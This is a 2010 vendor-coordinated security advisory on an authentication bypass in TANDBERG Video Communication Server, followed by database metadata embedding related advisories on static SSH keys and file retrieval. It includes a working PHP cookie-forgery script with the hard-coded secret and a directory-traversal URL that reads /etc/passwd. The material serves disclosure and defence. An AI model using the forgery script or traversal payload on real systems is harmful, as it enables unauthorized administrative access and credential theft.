-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: TANDBERG Video Communication Server Authentication Bypass
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.2.1 and possibly earlier
Severity: Critical
Discovered by: Jon Hart and Timothy D. Morgan
Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>
Vendor Status: Update released (without security advisory) on October 9, 2009
CVE Candidate: CVE-2009-4509
Reference: http://www.vsecurity.com/resources/advisory/20100409-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- -------------------
- From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks."
Vulnerability Overview
- ----------------------
On December 2nd, VSR identified an authentication bypass vulnerability in
TANDBERG's Video Communication Server, firmware version x4.2.1. This
vulnerability allows for the complete bypass of authentication in the
administrative web console. Since this web interface can be used to execute
arbitrary code on the appliance as root (via software updates), the severity is
considered critical.
Product Background
- ------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with number of other items.
Vulnerability Details
- ---------------------
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management. In version x4.2.1 of the appliance firmware
(and possibly earlier versions), it is possible to forge session cookies with
relatively little knowledge of the appliance's configuration.
The vulnerability lies in the files located at the following paths:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php
Routines in these files generate user session cookies in roughly the following
way:
SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH
In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is
the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp,
and ACCESS_RIGHTS is an integer denoting the level of access assigned to the
user.
Note, that none of the information above is difficult to guess. Any owner of a
TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is
contained in the firmware updates[2]). All TANDBERG appliances have a default
user name of "admin" which has full privileges. Therefore, it is possible with
a simple PHP script to forge new cookies and access the administrative
interface:
// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
function objectToCookie($obj)
{
$cookie = serialize($obj);
$cookie = gzcompress($cookie);
$cookie = base64_encode($cookie);
return $cookie;
}
function genCookie($server_addr, $remote_addr)
{
$user_name = "root";
$secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
$time = time()+24*60*60;
$id_hash = md5($user_name . $secret . $remote_addr . $time);
$access = 1; // ReadWrite
$login_cookie =
array( "user_name" => $user_name,
"access" => $access,
"id_hash" => $id_hash,
"ip" => $remote_addr,
"time" => $time
);
return objectToCookie($login_cookie);
}
print "Cookie: tandberg_login="
. urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}"))
. "\n";
// end of script //
TANDBERG released firmware version x4.3.0 which corrects this issue on
October 9, 2009 (prior to discovery of the vulnerability by VSR). The release
notes[3] for this updated version contain a description of the issue:
"Improved the security of the web interface to ensure that the system will not,
under any circumstances, allow an authenticated user to escalate their session
to more advanced privileges [Ref # 65050]."
However, VSR felt this does not adequately describe the problem. Clearly, as
the above exploit and pseudocode demonstrate, it would be possible to alter an
existing login session cookie to provide elevated "access" values without
updating the MD5 hash, since this value isn't included when the hash is
generated. However, the larger issue is that cookies can be forged from scratch
without an existing session.
In addition to this lack of clarity, no apparent security advisory for this
issue was released to the public via the normal channels (nor was it recorded in
the CVE as of this writing). Therefore, VSR felt it is in the public interest to
shed further light on the problem.
Versions Affected
- -----------------
VSR has successfully exploited this issue in version x4.2.1. Earlier versions
may also be affected. Version x4.3.0 corrects the problem through use of a
random secret and the inclusion of the "access" value in the hash.
Vendor Response
- ---------------
The following timeline details TANDBERG's response to the reported issue:
2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22 VSR provided TANDBERG a draft advisory.
2009-12-28 TANDBERG confirmed that this issue was corrected in version x4.3.
2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2] which corrected
other flaws identified by VSR.
2010-04-09 VSR advisory released.
Recommendation
- --------------
Upgrade to firmware version x4.3.0 (or newer) as soon as possible. If this is
not immediately possible, temporary mitigation could be achieved by changing
the "$this->secret" constant in the following files to something unpredictable:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php
Note that other vulnerabilities were identified in firmware versions prior to
x5.1.1. Therefore, upgrading to this version is recommended. See CVE-2009-4510
and CVE-2009-4511 for more information.
Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2009-4509 to this issue. This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Acknowledgements
- ----------------
Thanks to TANDBERG for the quick initial response and cooperation.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. TANDBERG - Video Communication Server
http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp
2. TANDBERG VCS Firmware Downloads
http://ftp.tandberg.com/pub/software/vcs/
3. TANDBERG VCS Version x4 Software Release Notes
http://ftp.tandberg.com/pub/software/vcs/TANDBERG%20Video%20Communication%20Server%20Software%20Release%20Notes%20(X4).pdf
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iD8DBQFLv/V9Q1RSUNR+T+gRAggEAJ492/MpyOUcUgpTtKCJHHOed920hQCfexkq
5hYHqemkmGHiM1F4/7QzPXk=
=jbo1
-----END PGP SIGNATURE-----
{"id": "SECURITYVULNS:DOC:23623", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "CVE-2009-4509: TANDBERG VCS Authentication Bypass", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Virtual Security Research, LLC.\r\n http://www.vsecurity.com/\r\n Security Advisory\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: TANDBERG Video Communication Server Authentication Bypass\r\n Release Date: 2010-04-09\r\n Application: Video Communication Server (VCS)\r\n Versions: x4.2.1 and possibly earlier\r\n Severity: Critical\r\nDiscovered by: Jon Hart and Timothy D. Morgan\r\n Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>\r\nVendor Status: Update released (without security advisory) on October 9, 2009\r\nCVE Candidate: CVE-2009-4509\r\n Reference: http://www.vsecurity.com/resources/advisory/20100409-1/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "The Video Communication Server (VCS) is an integral part of the TANDBERG \r\n Total Solution and is the center of the video communications network, \r\n connecting the benefits of video conferencing and telepresence to other \r\n communications environments including unified communications and IP Telephony\r\n networks."\r\n\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn December 2nd, VSR identified an authentication bypass vulnerability in \r\nTANDBERG's Video Communication Server, firmware version x4.2.1. This \r\nvulnerability allows for the complete bypass of authentication in the\r\nadministrative web console. Since this web interface can be used to execute \r\narbitrary code on the appliance as root (via software updates), the severity is\r\nconsidered critical.\r\n\r\n\r\nProduct Background\r\n- ------------------\r\nThe TANDBERG Video Communication Server is a Linux-based appliance which\r\nsupports the interoperation of a plethora of video and voice communications\r\ndevices. The VCS provides a web-based management interface implemented in PHP\r\nwhich allows administrators to perform a wide variety of actions, including\r\nconfiguration of the device, management of user accounts, firmware updates, \r\nalong with number of other items.\r\n\r\n\r\nVulnerability Details\r\n- ---------------------\r\nThe TANDBERG VCS web management interface utilizes custom cookies for the\r\npurpose of session management. In version x4.2.1 of the appliance firmware \r\n(and possibly earlier versions), it is possible to forge session cookies with\r\nrelatively little knowledge of the appliance's configuration.\r\n\r\nThe vulnerability lies in the files located at the following paths:\r\n /tandberg/web/lib/secure.php\r\n /tandberg/web/user/lib/secure.php\r\n\r\nRoutines in these files generate user session cookies in roughly the following\r\nway:\r\n\r\nSECRET = SERVER_ADDRESS + STATIC_VALUE\r\nHASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)\r\nCOOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH\r\n\r\nIn the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP\r\naddress, STATIC_VALUE represents a fixed string which is hard-coded into the\r\napplication source, USERNAME is the authenticated user name, CLIENT_ADDRESS is\r\nthe IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp, \r\nand ACCESS_RIGHTS is an integer denoting the level of access assigned to the\r\nuser.\r\n\r\nNote, that none of the information above is difficult to guess. Any owner of a \r\nTANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is\r\ncontained in the firmware updates[2]). All TANDBERG appliances have a default\r\nuser name of "admin" which has full privileges. Therefore, it is possible with\r\na simple PHP script to forge new cookies and access the administrative\r\ninterface:\r\n\r\n// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //\r\nfunction objectToCookie($obj)\r\n{\r\n $cookie = serialize($obj);\r\n $cookie = gzcompress($cookie);\r\n $cookie = base64_encode($cookie);\r\n return $cookie;\r\n}\r\n\r\nfunction genCookie($server_addr, $remote_addr)\r\n{\r\n $user_name = "root";\r\n $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";\r\n $time = time()+24*60*60;\r\n $id_hash = md5($user_name . $secret . $remote_addr . $time);\r\n $access = 1; // ReadWrite\r\n\r\n $login_cookie =\r\n array( "user_name" => $user_name,\r\n "access" => $access,\r\n "id_hash" => $id_hash,\r\n "ip" => $remote_addr,\r\n "time" => $time\r\n );\r\n\r\n return objectToCookie($login_cookie);\r\n}\r\n\r\nprint "Cookie: tandberg_login=" \r\n . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}")) \r\n . "\n";\r\n// end of script //\r\n\r\n\r\nTANDBERG released firmware version x4.3.0 which corrects this issue on \r\nOctober 9, 2009 (prior to discovery of the vulnerability by VSR). The release\r\nnotes[3] for this updated version contain a description of the issue:\r\n\r\n"Improved the security of the web interface to ensure that the system will not,\r\n under any circumstances, allow an authenticated user to escalate their session\r\n to more advanced privileges [Ref # 65050]."\r\n\r\nHowever, VSR felt this does not adequately describe the problem. Clearly, as\r\nthe above exploit and pseudocode demonstrate, it would be possible to alter an\r\nexisting login session cookie to provide elevated "access" values without\r\nupdating the MD5 hash, since this value isn't included when the hash is\r\ngenerated. However, the larger issue is that cookies can be forged from scratch\r\nwithout an existing session.\r\n\r\nIn addition to this lack of clarity, no apparent security advisory for this \r\nissue was released to the public via the normal channels (nor was it recorded in\r\nthe CVE as of this writing). Therefore, VSR felt it is in the public interest to\r\nshed further light on the problem.\r\n\r\n\r\n\r\nVersions Affected\r\n- -----------------\r\nVSR has successfully exploited this issue in version x4.2.1. Earlier versions\r\nmay also be affected. Version x4.3.0 corrects the problem through use of a\r\nrandom secret and the inclusion of the "access" value in the hash.\r\n\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details TANDBERG's response to the reported issue:\r\n\r\n2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.\r\n\r\n2009-12-22 VSR provided TANDBERG a draft advisory.\r\n\r\n2009-12-28 TANDBERG confirmed that this issue was corrected in version x4.3.\r\n\r\n2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2] which corrected\r\n other flaws identified by VSR.\r\n\r\n2010-04-09 VSR advisory released.\r\n\r\n\r\n\r\nRecommendation\r\n- --------------\r\nUpgrade to firmware version x4.3.0 (or newer) as soon as possible. If this is\r\nnot immediately possible, temporary mitigation could be achieved by changing\r\nthe "$this->secret" constant in the following files to something unpredictable:\r\n /tandberg/web/lib/secure.php\r\n /tandberg/web/user/lib/secure.php\r\n\r\nNote that other vulnerabilities were identified in firmware versions prior to\r\nx5.1.1. Therefore, upgrading to this version is recommended. See CVE-2009-4510\r\nand CVE-2009-4511 for more information.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2009-4509 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n\r\nAcknowledgements\r\n- ----------------\r\nThanks to TANDBERG for the quick initial response and cooperation.\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. TANDBERG - Video Communication Server\r\n http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp\r\n\r\n2. TANDBERG VCS Firmware Downloads\r\n http://ftp.tandberg.com/pub/software/vcs/\r\n\r\n3. TANDBERG VCS Version x4 Software Release Notes\r\n http://ftp.tandberg.com/pub/software/vcs/TANDBERG%20Video%20Communication%20Server%20Software%20Release%20Notes%20(X4).pdf\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niD8DBQFLv/V9Q1RSUNR+T+gRAggEAJ492/MpyOUcUgpTtKCJHHOed920hQCfexkq\r\n5hYHqemkmGHiM1F4/7QzPXk=\r\n=jbo1\r\n-----END PGP SIGNATURE-----", "published": "2010-04-14T00:00:00", "modified": "2010-04-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23623", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-4511", "CVE-2009-4510", "CVE-2009-4509"], "immutableFields": [], "lastseen": "2018-08-31T11:10:34", "viewCount": 90, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4509", "CVE-2009-4510", "CVE-2009-4511"]}, {"type": "nessus", "idList": ["TANDBERG_VCS_SSH_KEY.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105497"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:88240"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23621", "SECURITYVULNS:DOC:23622", "SECURITYVULNS:VULN:10756"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-4509", "CVE-2009-4510", "CVE-2009-4511"]}, {"type": "nessus", "idList": ["TANDBERG_VCS_SSH_KEY.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:88240"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10756"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2009-4511", "epss": "0.013090000", "percentile": "0.838330000", "modified": "2023-03-19"}, {"cve": "CVE-2009-4510", "epss": "0.002120000", "percentile": "0.574560000", "modified": "2023-03-19"}, {"cve": "CVE-2009-4509", "epss": "0.059350000", "percentile": "0.922810000", "modified": "2023-03-19"}], "vulnersScore": 0.6}, "_state": {"dependencies": 1678962961, "score": 1678962848, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "5c00995a09fc64b63a7ce9aa1c1a019d"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}
{"securityvulns": [{"lastseen": "2021-06-08T19:13:54", "description": "Static ssh key, authentication bypass, files access.", "cvss3": {}, "published": "2010-04-14T00:00:00", "type": "securityvulns", "title": "TANDBERG Video Communication Server multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-4511", "CVE-2009-4510", "CVE-2009-4509"], "modified": "2010-04-14T00:00:00", "id": "SECURITYVULNS:VULN:10756", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10756", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Virtual Security Research, LLC.\r\n http://www.vsecurity.com/\r\n Security Advisory\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: TANDBERG Video Communication Server Static SSH Host Keys\r\n Release Date: 2010-04-09\r\n Application: Video Communication Server (VCS)\r\n Versions: x4.3.0, x4.2.1, and possibly earlier\r\n Severity: High\r\nDiscovered by: Jon Hart\r\n Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>\r\nVendor Status: Firmware version x5.1.1 released [2].\r\nCVE Candidate: CVE-2009-4510\r\n Reference: http://www.vsecurity.com/resources/advisory/20100409-2/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "The Video Communication Server (VCS) is an integral part of the TANDBERG \r\n Total Solution and is the center of the video communications network, \r\n connecting the benefits of video conferencing and telepresence to other \r\n communications environments including unified communications and IP Telephony\r\n networks."\r\n\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn December 2nd, VSR identified a SSH service authentication weakness\r\nvulnerability in the TANDBERG's Video Communication Server. This issue would\r\nallow an attacker with privileged network access to conduct server impersonation\r\nand man-in-the-middle attacks on administrator SSH sessions. Successful attacks\r\ncould yield shell access to vulnerable appliances.\r\n\r\n\r\nProduct Background\r\n- ------------------\r\nThe TANDBERG Video Communication Server is a Linux-based appliance which\r\nsupports the interoperation of a plethora of video and voice communications\r\ndevices. The VCS provides several system shell accounts accessible via the SSH\r\nprotocol.\r\n\r\n\r\nVulnerability Details\r\n- ---------------------\r\nThe TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored\r\nin files:\r\n /tandberg/sshkeys/ssh_host_dsa_key\r\n /tandberg/sshkeys/ssh_host_dsa_key.pub\r\n\r\nIn tested versions of the firmware, this default key has a fingerprint of: \r\n 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8\r\n\r\nNo new key is generated upon installation. In addition, this default key would\r\noverwrite any SSH server keys, if installed by security-conscious administrators\r\npreviously, during a firmware upgrade.\r\n\r\nDue to the public nature of this key (see firmware downloads [2]) an attacker\r\nwould be able to conduct server impersonation and man-in-the-middle attacks on\r\nSSH connections directed at any TANDBERG VCS device. A successful exploit would\r\nmost likely yield an attacker shell access to the device with privileges of the\r\nvictim client.\r\n\r\n\r\nVersions Affected\r\n- -----------------\r\nVSR has observed this vulnerability in version x4.2.1. Based on preliminary\r\nanalysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also\r\nappear to be vulnerable. Earlier versions have not been tested.\r\n\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details TANDBERG's response to the reported issue:\r\n\r\n2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.\r\n\r\n2009-12-22 VSR provided TANDBERG a draft advisory.\r\n\r\n2009-12-28 TANDBERG provided VSR with a beta version of the x5.0 firmware,\r\n but this did not appear to correct the issue.\r\n\r\n2010-01-22 TANDBERG provided VSR with a beta version of the x5.1 firmware,\r\n but this did not appear to correct the issue for existing \r\n installations, since old vulnerable keys would be preserved.\r\n\r\n2010-01-28 TANDBERG explained that changing SSH keys automatically on\r\n administrators may cause backward compatibility problems. \r\n Therefore, TANDBERG decided to preserve old keys even when\r\n upgrading a system which contains a vulnerable key. \r\n Administrators will instead be warned in the web console that a\r\n vulnerable key is in use and will be expected to update host keys\r\n manually.\r\n\r\n2010-03-26 TANDBERG provided VSR with a release candidate firmware for \r\n version x5.1.1.\r\n\r\n2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2].\r\n\r\n2010-04-09 VSR advisory released.\r\n\r\n\r\n\r\nRecommendation\r\n- --------------\r\nImmediately replace the current SSH host key with a new one. This may\r\nbe accomplished through one of several methods. One approach is to\r\nsimply log in to the device locally and use the ssh-keygen utility to\r\nreplace the keys stored in /tandberg/sshkeys/. Consult TANDBERG\r\ndocumentation for other methods.\r\n\r\nAfter replacing the SSH host keys, it is recommended that the VCS\r\nfirmware be upgraded to X5.1.1 as soon as possible. NOTE: Upgrading or\r\ndowngrading to versions prior to X5.1.1 will cause any custom SSH host\r\nkeys to be overwritten. Version X5.1.1 and later should preserve any\r\ncustom host keys previously installed. As a precaution, after upgrading\r\nor downgrading VCS firmwares, verify that the host key has not changed back\r\nto the publicly known one with fingerprint:\r\n 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2009-4510 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n\r\nAcknowledgements\r\n- ----------------\r\nThanks to TANDBERG for the quick initial response and cooperation.\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. TANDBERG - Video Communication Server\r\n http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp\r\n\r\n2. TANDBERG VCS Firmware Downloads\r\n http://ftp.tandberg.com/pub/software/vcs/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niD8DBQFLv/ZjQ1RSUNR+T+gRAk5EAJ9Aly3VUC1kCoseUASB/1gb+eRH6QCdE2Mc\r\nNuQ3zzKVVFfT/KJVJ3gDsGo=\r\n=AKS8\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-04-14T00:00:00", "type": "securityvulns", "title": "CVE-2009-4510: TANDBERG VCS Static SSH Host Keys", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-4510"], "modified": "2010-04-14T00:00:00", "id": "SECURITYVULNS:DOC:23621", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23621", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Virtual Security Research, LLC.\r\n http://www.vsecurity.com/\r\n Security Advisory\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval\r\n Release Date: 2010-04-09\r\n Application: Video Communication Server (VCS)\r\n Versions: x4.3.0, x4.2.1, and possibly earlier\r\n Severity: Medium\r\nDiscovered by: Jon Hart\r\n Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>\r\nVendor Status: Firmware update released [2]\r\nCVE Candidate: CVE-2009-4511\r\n Reference: http://www.vsecurity.com/resources/advisory/20100409-3/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "The Video Communication Server (VCS) is an integral part of the TANDBERG \r\n Total Solution and is the center of the video communications network, \r\n connecting the benefits of video conferencing and telepresence to other \r\n communications environments including unified communications and IP Telephony\r\n networks."\r\n\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn December 3rd, VSR identified a directory traversal and file retrieval\r\nvulnerability in the TANDBERG's Video Communication Server. This issue would\r\nallow an authenticated attacker (who has access as an administrator or less\r\nprivileged user on the web administration interface) to retrieve files from the\r\nfilesystem which are readable by the "nobody" system user.\r\n\r\n\r\nProduct Background\r\n- ------------------\r\nThe TANDBERG Video Communication Server is a Linux-based appliance which\r\nsupports the interoperation of a plethora of video and voice communications\r\ndevices. The VCS provides a web-based management interface implemented in PHP\r\nwhich allows administrators to perform a wide variety of actions, including\r\nconfiguration of the device, management of user accounts, firmware updates, \r\nalong with number of other items.\r\n\r\n\r\nVulnerability Details\r\n- ---------------------\r\nThe TANDBERG VCS web management interface provides two nearly identical scripts\r\nat URLs:\r\n https://vulnerable.example.com/helppage.php\r\n https://vulnerable.example.com/user/helppage.php\r\n\r\nThese help pages accept a "file" parameter in the URL which can be used to\r\nretrieve nearly arbitrary files from the filesystem. The relevant source code\r\nfor these pages is as follows:\r\n\r\n// The following is Copyright (C) 2009 TANDBERG //\r\n...\r\n// Grab the content before we write anything: we'll need it for the title tag in the <head>\r\n// Dig out the page title, from the <title> tag, \r\n// then remove any surround in the page as we add our own... \r\n$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;\r\n \r\nif (! file_exists($filename)) {\r\n $helpHTML = "There is no help available for the ". $_GET['page'] . " page<br/>";\r\n $pageTitle = $_GET['page'];\r\n}else{\r\n $helpHTML = file_get_contents($filename);\r\n\r\n...\r\n\r\n echo "\n<!-- ********** -->\n";\r\n echo $helpHTML;\r\n echo "<!-- ********** -->\n";\r\n...\r\n// end of excerpt //\r\n\r\n\r\nHere, the final path string ($filename) loaded and displayed to the user is\r\nprepended with a directory and appended with a file extension. Using simple\r\ndirectory traversal techniques ("../") it is possible to traverse to any\r\ndirectory on the filesystem. Using a trailing NUL byte encoded in the URL (%00)\r\nit is also possible to truncate the file path to eliminate the file extension.\r\n\r\nFor instance, the following URL retrieves the /etc/passwd file:\r\n\r\n https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00\r\n\r\n\r\nDuring testing, it was found that the x4.2.1 firmware runs the web server as the\r\n"nobody" user, which somewhat limits the amount of sensitive information that\r\nmay be obtained. However, since shadowed passwords were not configured, it was\r\npossible to retrieve all local system users' password hashes from /etc/passwd. \r\nAdditional password hashes are available in /tandberg/persistent/etc/digest.\r\n\r\n\r\nVersions Affected\r\n- -----------------\r\nVSR has successfully exploited this issue in firmware version x4.2.1. Based on\r\npreliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be\r\nvulnerable. Earlier versions have not been tested.\r\n\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details TANDBERG's response to the reported issue:\r\n\r\n2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.\r\n\r\n2009-12-22 VSR provided TANDBERG a draft advisory.\r\n\r\n2009-12-28 TANDBERG provided VSR with a beta version of the x5.0 firmware,\r\n but this did not appear to correct the issue (based on PHP code\r\n analysis alone).\r\n\r\n2010-01-22 TANDBERG provided VSR with a beta version of the x5.1 firmware \r\n for testing which appeared to correct the vulnerability.\r\n\r\n2010-03-26 TANDBERG provided VSR with a release candidate firmware for \r\n version x5.1.1.\r\n\r\n2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2].\r\n\r\n2010-04-09 VSR advisory released.\r\n\r\n\r\nRecommendation\r\n- --------------\r\nUpgrade to version x5.1.1 to correct this issue. Temporary mitigation may be \r\nachieved by disabling access for potentially less trusted, non-adminstrative\r\nusers.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2009-4511 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n\r\nAcknowledgements\r\n- 